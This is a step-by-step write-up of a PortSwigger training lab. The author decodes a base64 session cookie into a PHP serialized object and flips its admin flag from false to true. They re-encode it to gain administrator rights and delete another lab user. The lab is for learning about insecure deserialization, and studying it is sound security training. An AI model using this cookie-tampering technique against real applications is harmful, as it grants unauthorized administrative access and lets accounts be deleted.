# Modifying serialized objects

[Level description](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects) - Apprentice


## Walk through

1. Login to the level as `wiener`.

2. Bring up the dev console and switch to the `Application` tab.

3. Inspect the `session` cookie (url decoded)

    ```
    Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30=
    ```

4. Perform a base64 decode on the `session` cookie

    ```
    O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
    ```

5. Recognize the decoded string is a serialized php object.
The `admin` property is a boolean value that is set to 0, or false.

6. Modify `b:0;` to `b:1;` - this sets the admin flag to true

    ```
    O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
    ```

7. Perform a base64 encode on the modified string, and use it
in the `session` cookie to gain admin privilege.

8. *Delete carlos*
